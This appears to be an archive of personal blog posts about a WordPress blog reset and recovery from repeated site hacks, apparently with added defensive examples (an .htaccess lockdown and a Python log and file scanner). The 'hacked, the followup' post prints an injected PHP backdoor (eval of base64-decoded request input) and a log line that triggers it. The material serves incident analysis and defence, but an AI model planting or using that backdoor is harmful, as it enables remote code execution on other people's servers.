Same Words, Better Contrast

Three people in the last day or so have mentioned that this blog’s grey text on a white background is really hard to read. I swear I did not do that on purpose, and I suspect that something in my theme changed out from under me. (This is the hazard of inheriting from an existing theme vs writing your own.)

I’ve darkened all the body text and I hope it is easier to read now.

On the Subject of a Blog Reset, as a Series of Questions

Q: I thought you abandoned your blog in 2013 for twitter.

I did! And I’ve felt insanely guilty about it ever since.

Recently, however, I’ve been having more conversations on twitter where the 140-character limit is, well, limiting. I’ve found it frustrating to make any kind of a complex argument across a tweet thread, even with linked conversations. Some thoughts need more room.

I’ve also wanted for some time now to get back into the habit of writing for fun. The full-time day job I had until recently was sucking up a lot of my writing energy, and I’ve done very little writing in the last bunch of years that wasn’t job-related, or 140 characters or less.

But since I recently left that day job, now is as good a time as any for a full-on blog reset.

Q: What happened to blog.lauralemay.com?

Ages ago I set up my blog on a separate subdomain from my “main” site, and I can’t remember why. It seemed like a good idea at the time, maybe?

Having two different sites ended up being more annoying than I had intended. For one thing, I was trying to maintain two entirely different wordpress installs, with separate themes and plugins. (Yes, I know about WP multisite, and at the time I could not get it to work. LS;B (Long story, boring)).

With the reset I have merged everything back into www.lauralemay.com and a single wordpress install. The blog.lauralemay.com site still exists but I’m planning to put in a redirect once things here have settled down.

Q: I can’t believe you’re still using WordPress when you got so badly hacked, repeatedly, in the past. What’s wrong with you?

This is really a case of “better the devil you know.”

My original plan for a new blog had been to set up something simpler, easier to understand, and less prone to hacking problems than WordPress.

I spent a couple months earlier this year down a rabbit hole of learning all about static site generators (like Jekyll and Pelican and Hyde) for just this reason.

But the deeper into that rabbit hole I got, the more I realized how much work it was going to be to modify any static site software to output the design and structure and functionality I wanted. The time investment was going to be way more than I was willing to spend given that the actual goal was to write more, not spend more time working on software, or being my own sys admin.

WordPress has its issues, and I’ve seen a lot of them, but I understand it fairly well at this point. Also the community around themes and plugins is so rich that using WordPress gives you a huge step up in building a blog-like site versus starting everything from scratch.

Q: Yes, OK, but the hacking thing?

I figured out the hacking thing. If you put wp-login.php and the entire wp-admin directory behind access control (I use .htaccess) then the hacking stops. My old blog (and my old site) have been locked down like this for three years and I have had no further issues at all. (This is not a challenge.)
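As an added example (not the author’s own configuration), here is the kind of .htaccess access control described above: HTTP Basic authentication on wp-login.php and on everything under wp-admin, with admin-ajax.php left reachable because many themes and plugins call it on behalf of ordinary visitors. The realm name and the path to the htpasswd file are assumptions.

```apache
# Added example, not the author's file.  Two fragments: the first belongs in
# the WordPress root .htaccess, the second in wp-admin/.htaccess.
# The AuthUserFile path is an assumption; keep that file outside the web root.

# --- WordPress root .htaccess: require a password for the login script ---
<Files "wp-login.php">
    AuthType Basic
    AuthName "Restricted"
    AuthUserFile /home/example/.htpasswd
    Require valid-user
</Files>

# --- wp-admin/.htaccess: the same requirement for the whole directory ---
AuthType Basic
AuthName "Restricted"
AuthUserFile /home/example/.htpasswd
Require valid-user

# admin-ajax.php is fetched by front-end themes and plugins for anonymous
# visitors; exempt it so the public site keeps working (Apache 2.2 syntax).
<Files "admin-ajax.php">
    Order allow,deny
    Allow from all
    Satisfy Any
</Files>
```

Create the password file with `htpasswd -c /home/example/.htpasswd <user>`; on Apache 2.4 without mod_access_compat, the admin-ajax.php exemption is written as a single `Require all granted` in place of the Order/Allow/Satisfy lines.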

Q: You don’t have comments enabled. When are you going to turn comments back on?

I’m not. I did leave the old comments in place on my old blog posts because it felt weird to just delete them. New posts do not have comments, and won’t.

Even on a blog as little-read as this one just managing spam in the comments was a pointless time sink. Replying to and managing actual real-life comments was also a lot less fun than I had thought it would be. At best I feel like I’m not keeping up, and guilty for not engaging better. At worst there are seemingly endless numbers of blowhards who use my comments to lecture or “well-actually” me, or to argue at length about things only semi-related to my actual posts. There are plenty of places to have an opinion on the Internet. This is mine. Get your own blog.

I am easily found on twitter or email if you really want to talk to me about something I’ve written.

Q: Are you going to talk endlessly about octopus and chickens all the time like you did before?

Yes! Also food, and cooking, and gardening. No links (those go on twitter). More personal stuff. And (I hope) much shorter posts rather than the 20-page essays and the immense multipart sagas I was doing before. (This post so far is not a good start.)

You will also occasionally see a post about technical writing, which is what I do for a living and a subject I feel strongly about (Yes, I know, I am strange). I am still figuring out the right way to categorize different subjects in the same blog, so we’ll see.

Titles will be properly uppercased this time around as well.

Q: Your ideas are intriguing to me and I wish to subscribe to your newsletter.

My new RSS feed is at https://www.lauralemay.com/feed. A blog-only feed (no pictures, links, tweets or other stuff sucked in from elsewhere) is https://www.lauralemay.com/blog/feed. You can also follow me on twitter for new post alerts.

in which actual fiction occurs

I’ve posted a new short story over on my main site. It’s called The Deadline, and it’s a sort of dotcom horror thing. This is actually a new/old story: I started writing it in 1999 and never finished it. I recently dug it up again and realized it wasn’t that bad, although it’s kind of dated. I finished it and updated some of the more obvious anachronisms but it still has a strong 1999 feel.

I also finally got around to updating the design of my main site and putting everything back into content management. The one advantage of rebuilding wordpress a couple of times is that I’ve become very good at it. (wan smile)

hacked, the followup

(I am getting a lot of hits on this post from google. If you came here because you think your wordpress install has been hacked as well, make sure you also read Hacked! and Hacked, Again!)

I’ve done nearly all the design updates I’m going to do to the blog for now although I have a plenty large To Do list left. Sadly it’s an almost entirely different To Do list than I had before this mess happened.

This is my technical followup to what happened; you can skip it if you don’t care about the details. It is long (of course). I’ll get back to talking about chickens and food soon enough.

We ended yesterday with a complete reinstall of all the files on all my web sites, including a brand new version of WordPress and a new database for this blog. In retrospect, this is what I should have done straight off on monday. The #1 thing I have learned from this is when in doubt, assume it is WordPress and nuke it from space.

Notes on WordPress Security

I’m 99% sure that my hacker got into WordPress via a script called timthumb. This is a known WordPress vector for abuse — tons of themes and plugins use this script. In my case it was my theme, Thesis, that used it. This timthumb page has a lot of technical detail about why it is a problem, although the phrase “allowing hackers to upload and execute arbitrary PHP code” generally says it all.

There is a WordPress plugin called Timthumb Vulnerability Scanner that will check your entire WordPress installation for old versions of timthumb and makes sure you are not subject to this hack. Note that I was using a current version of a respected paid theme and the most recent version of WordPress and the timthumb vulnerability was still there.

I also use the wp-security plugin for general WordPress security, which encourages you to make some of the more obvious changes to wordpress to keep hackers out (removing the admin account, renaming your database tables, etc.). I admit I had not implemented everything that wp-security recommended, because I was lazy. But even if I had it would not have helped with the timthumb hack.

The makers of wp-security have a web site called Website Defender that does much more in-depth security testing of your installation. I hadn’t gotten around to signing up for or installing the Website Defender tools (it requires some PHP to be placed on your web site, which, frankly, worried me right there). But a few people on twitter recommended it, so once I got my new software installed I set it up, and it looks MUCH more comprehensive for protecting WordPress. I kind of consider it anti-virus software for WordPress. They can keep track of new vulnerabilities so I don’t have to.

Lurking Horror in Non-Static Static HTML

I had been worried yesterday that my hacker was somehow able to modify files in my static HTML sites (my www.lauralemay.com and work.lauralemay.com sites) from the hacked WordPress blog site. This led me to believe that I actually had a worse hacker than just a web-based script-kiddie. It turns out I was wrong. PHP was the problem, and I had PHP everywhere that I just didn’t know about or wasn’t paying attention to. This was my fault for not being more diligent.

In the case of my www site, I once ran Movable Type there, and although I had turned off the software itself years ago I still had the files sitting around in the directory and accessible from the web. Tons of PHP floating around in there. This was dumb of me to keep around — especially since it was a very old version of Movable Type.

I was sure that my work site was safe — I wrote all that myself, in plain HTML and CSS. And then buried deep in a sub-sub-sub directory I found one PHP file that Dreamweaver of all things had written as part of “design notes” for the site. I know there was one time I used DreamWeaver for the site but it was years ago and I thought I had long since deleted all those extra notes directories. ONE FILE I didn’t even know was there, but the hacker scripts found it, and that was all it took. (Fortunately all I had to do was trash that one file and that was the end of it.)

I See You

While I was sitting around waiting for stuff to install and reimport and whatnot I got to thinking that maybe there were traces of my hacker in my access and error logs. Fortunately this is not a high-traffic web site (hah), so I could grep out typical requests and page through the rest of my logs without having to look at a zillion lines. A whole lot of lines like this one immediately stood out:

46.37.184.254 - - [04/Jan/2012:03:10:38 -0800] "GET /wp-admin/includes/schema.php?img_id=1f3870be274f6c49b3e31a0c6728957f&mod_content=ZWNobyAiZ29vZ2xlZWVlIjs= HTTP/1.0" 301 572 "http://facebook.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Tablet PC 2.0; .NET4.0C)"

I know of no legitimate reason for anyone to request anything inside wp-admin unless they are actually administering the site. There’s especially no reason to request schema.php, and no reason at all to give it arguments (img_id and mod_content). I had a copy of my hacked site on my local machine, and I took a look at schema.php. Bingo. Right at the top of the file, above the comments:

<?php if((md5($_REQUEST["img_id"]) == "ae6d32585ecc4d33cb8cd68a047d8434") && isset($_REQUEST["mod_content"])) { eval(base64_decode($_REQUEST["mod_content"])); exit(); } ?>

eval(base64_decode you say? I don’t think so. I searched my entire blog site, and found about ten PHP files all over the place that had these lines scribbled at the start. Then I looked through my log files and there was my hacker, always at the same IP address, always pinging those same hacked files.
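The two checks described above, as an added example that is not the author’s code: one pass over access-log lines that flags requests for files under /wp-admin/ carrying query arguments, and one pass over PHP source that flags the eval(base64_decode($_REQUEST[...])) prefix. The log lines, IP addresses, md5 literal and base64 value are constructed for the example.

```python
"""Added example, not the author's code: the two checks described above, run
on constructed sample data.  (1) flag access-log requests for files under
/wp-admin/ that carry a query string, since nothing legitimate passes
?img_id=...&mod_content=... to schema.php; (2) flag PHP files that begin with
an eval(base64_decode($_REQUEST[...])) prefix like the one quoted above."""
import re
from urllib.parse import parse_qs, urlsplit

# Apache combined log format; only the fields used below are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<when>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Signature of the injected prefix: eval of base64 taken straight from a request.
BACKDOOR_RE = re.compile(
    r'eval\s*\(\s*base64_decode\s*\(\s*\$_(REQUEST|GET|POST)\b', re.IGNORECASE
)


def suspicious_admin_requests(lines):
    """Return (client ip, path, sorted query keys) for wp-admin hits with arguments."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a parseable combined-format line
        url = urlsplit(m["target"])
        if url.path.startswith("/wp-admin/") and url.query:
            keys = sorted(parse_qs(url.query, keep_blank_values=True))
            hits.append((m["ip"], url.path, keys))
    return hits


def has_backdoor_prefix(php_source, head_chars=2048):
    """True if the start of a PHP file carries the eval(base64_decode(...)) backdoor."""
    return BACKDOOR_RE.search(php_source[:head_chars]) is not None


# Constructed samples modelled on the post; addresses are documentation IPs.
SAMPLE_LOG = [
    '203.0.113.7 - - [04/Jan/2012:03:10:38 -0800] "GET /wp-admin/includes/schema.php'
    '?img_id=1f3870be&mod_content=ZWNobyAiaGkiOw== HTTP/1.0" 301 572 '
    '"http://facebook.com/" "Mozilla/4.0 (compatible; MSIE 8.0)"',
    '198.51.100.9 - - [04/Jan/2012:03:11:02 -0800] "GET /2012/01/chickens/ '
    'HTTP/1.1" 200 8123 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [04/Jan/2012:03:11:05 -0800] "GET /wp-admin/css/install.css '
    'HTTP/1.1" 200 1201 "-" "Mozilla/5.0"',
]
CLEAN_PHP = "<?php\n/**\n * WordPress Administration Scheme API\n */\n"
INFECTED_PHP = (  # constructed md5 literal, same shape as the quoted prefix
    '<?php if((md5($_REQUEST["img_id"]) == "0123456789abcdef0123456789abcdef") '
    '&& isset($_REQUEST["mod_content"])) { eval(base64_decode($_REQUEST'
    '["mod_content"])); exit(); } ?>\n' + CLEAN_PHP
)

if __name__ == "__main__":
    for ip, path, keys in suspicious_admin_requests(SAMPLE_LOG):
        print(f"{ip} requested {path} with arguments {keys}")
    for name, src in (("clean", CLEAN_PHP), ("infected", INFECTED_PHP)):
        print(name, "backdoor prefix:", has_backdoor_prefix(src))
```

On a real site, feed the access log through the first function and every *.php under the document root through the second; legitimate wp-admin traffic from your own address is easy to exclude by IP.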

None of this actually really mattered, since I had trashed all the hacked files when I reinstalled WordPress. But one of the first things I did when my new site was set up was to block that IP address. And today as I watch my logs roll by I am pleased to see “client denied by server configuration” coming up again and again.

Feeeelings

I’m not feeling the least bit confident about web software right now, and thinking about the security problems of complex web applications in general is making me break out in hives. It seems that the more complex a web app is the more likely it is that someone out there is going to fuck with it, and I just don’t have the time for that. I went to shared hosting precisely because I was tired of being my own sys admin. I can do it, but I’m not all that good at it, and I don’t want to. I want to write.

On the other hand, the idea of giving up all the administration and putting all my stuff in the cloud also doesn’t give me happy warm fuzzies. Because of course in that situation the cloudmasters are hadooping away on everything I do and generating all sorts of valuable advertising thneeds.

Either way it seems I’m eventually going to be pwned by someone.

grumble.

hacked, again!

(I am getting a lot of hits on this post from google. If you came here because you think your wordpress install has been hacked as well, make sure you also read Hacked! and Hacked, the Followup)

It turns out that everything I did yesterday made no difference at all, and my hacker came back in overnight and rewrote my files all over again.

So today I blew away all the files on my web host including the WordPress install and the database and started all over again. While I was doing that I took the opportunity to update the theme software (I use thesis), and since I was there scrabbling around with CSS and PHP I made some design changes I had been wanting to do anyhow.

I have another technical post I want to make because I figured out how the hacker got in and exactly what he or she was doing, and there’s still a bunch of stuff missing from the site, but right now I am tired and hungry and I’d like to be done for today.

I apologize if you were desperate to read my long-winded pointless ramblings while I had the site offline.

hacked!

(I am getting a lot of hits on this post from google. If you came here because you think your wordpress install has been hacked as well, make sure you also read Hacked, Again! and Hacked, the Followup)

So, I had a fun afternoon, how about you?

A week or so ago, I noticed an odd thing: Google Reader had stopped updating my blog feeds. Around that time I had been mucking with the blog feeds (see Housekeeping) so I figured maybe I had confused Google Reader, and if I ignored it, maybe it would go away.

Hint: if Google gets annoyed at your web site, perhaps there is something wrong with your web site.

Then yesterday I noticed that if I unsubscribed to my blog feed in Google Reader and resubscribed to it, the title to my blog would not come up. Instead Google Reader decided the title was “Personal Creations Elmo, Consumer Payday Loans – $300 – $2500.”

I became indignant. My blog looked fine to me. It looked fine from a variety of other locations. The code looked fine if I grabbed it with curl. Something was wrong with Google.

Hint: It’s unlikely something is wrong with Google. Something might be wrong with your site.

Then it got worse and it spread to my search results:

(screenshot of the Google search results)

At the same time a friend sent me a screen shot of my web site as he saw it:

(screenshot of the site as he saw it)

Yeah, I got hacked. But it was a selective hack; only the google and yahoo crawlers and referers from google and yahoo saw it. (no one actually uses the Yahoo search engine.)

I spent the day cleaning up from this hack, including doing it twice because it came back. I still don’t know where it came from or if it’s going to come back again. This was not a lot of fun.

I googled what I found and turned up almost no information at all; no exploits, no descriptions, no patches, nothing. I don’t know if what I had was new, or if it was obscure, or what. Technical details in the More part of this post.

Housekeeping

I’ve made a ton of fixes to the blog and to my main web site over the last week, including the broken archive links as well as redirects for links and ancient feeds that have been broken for years. In particular: you livejournalers are probably going to start seeing me again for the first time since 2007.

I note from the logs that a lot of people browse this blog by category. Only about 30% of the site is categorized; I’m still working on that.

Contact form is still broken.

I can write OR I can go make stuff OR I can maintain ever-decaying blog software. Mutter.

How to make a complete mess of a blog reboot

This last weekend since it was a long holiday weekend I was thinking it was way long past due I started posting to my blog again. But instead of actually just posting I was fiddling around in the back end software, fixing links, adding categories, updating plugins and themes and playing with fonts. Because of course fussy repetitive software fiddling is just so much easier than actually writing anything. (Especially writing anything over 140 characters these days (guilty expression)).

But then late on Sunday there was this auto-tagging plugin that did something stupid, and then there was a plugin to remove the thousands of tags that the auto-tagging plugin created but didn’t, and then there was a theme upgrade that went awry, and a theme downgrade that went even more awry. And after a couple hours of fiddling I found myself staring at a blog that not only didn’t have any new posts in 18 months, it was also worse, organizationally, than when I started, AND it was completely unreadable.

Hooray!

Fortunately, I’ve been making database backups this whole time. Unfortunately, I didn’t have a clue what to do with a database backup should I need to restore it. And it’s kind of unnerving to stand on the edge of a precipice staring at a database interface that’s asking you, “are you SURE you want to drop all the tables in this database? Are you REALLY sure?  REALLY REALLY SURE??” Because I really really wasn’t sure.

But to make a pointless long story short, I got the blog back, I got my design back, all of the fiddling I did yesterday got wiped out, and I’m back to where I started, with no new posts in 18 months.

Except, now, this one.

If you can see this, I am alive

It is nice when months of fretting pays off in a ten-minute update with only a few dumbass PHP errors.

There are still some messy bits here and old links are broken. I have some new images to put in later on when I finish drawing them. And the “www” part of the site is still old. But it’ll be easier to fix everything now that the new blog is settled into its new home.

lockdown, migration imminent

I’ve closed down comments on all the posts here in preparation for a big blog move. I’m migrating all my web sites over to WordPress, with a new simpler structure and an integrated redesign. I think I’ve planned everything out, and I’ve done most of the work on a testing site, but who knows how well it’ll actually work when I put it all in place. This old site you’re looking at is a really old movable type installation with a lot of hand-built customizations, most of which were really stupid in retrospect (my urge to tinker won out over basic common sense). The conversion has been a lot more painful as a result.

The biggest change for many of you will be a new feed URL. The old blog supported every variety of feed flavor; the new blog will have only one feed (RSS) and it’ll be at a different URL. (https://www.lauralemay.com/feed)

I’ll redirect all the old feed URLs to the new feed but I don’t know how well that’ll work for feed readers. I’ll also put up a reminder post in the old feeds when the conversion goes through.

This is not like putting a lander on mars or anything, but my goal for all this brouhaha is to make it easier for me to actually, you know, write.